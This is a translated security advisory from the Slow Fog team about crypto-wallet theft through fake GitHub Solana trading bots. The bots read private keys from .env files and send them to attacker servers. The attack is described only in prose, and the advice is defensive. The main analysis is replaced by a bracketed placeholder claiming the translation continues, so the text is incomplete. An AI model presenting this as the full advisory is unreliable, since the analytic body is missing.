Source: Slow Fog Technology
Original link: https://mp.weixin.qq.com/s/Tu5queqqz874swt6znwbtA
Background
In early July 2025, the Slow Fog security team received help from a victim user requesting assistance in analyzing the cause of their stolen crypto assets. The investigation revealed that the incident originated from the user using an open-source project hosted on GitHub called zldp2002/solana-pumpfun-bot, which triggered a covert asset theft, details can be found in GitHub Popular Solana Tool Hides Asset Theft Trap.
Recently, another user contacted the Slow Fog security team after losing crypto assets by using a similar open-source project - audiofilter/pumpfun-pumpswap-sniper-copy-trading-bot. The team further analyzed the attack method.
[The rest of the translation follows the same approach, maintaining technical terms and preserving the original structure]In the attack method shared this time, the attacker disguises themselves as a legitimate open-source project, inducing users to download and execute the malicious code. The project reads sensitive information from the local .env file and transmits the stolen private keys to a server controlled by the attacker. Such attacks usually combine social engineering techniques, and users can easily fall victim if they are not careful.
We recommend that developers and users remain highly vigilant about GitHub projects of unknown origin, especially when involving wallet or private key operations. If it is necessary to run or debug, it is recommended to do so in an isolated environment without sensitive data to avoid executing malicious programs and commands from unknown sources.
For more security knowledge, refer to the "Blockchain Dark Forest Self-Rescue Manual" produced by SlowMist:
https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md
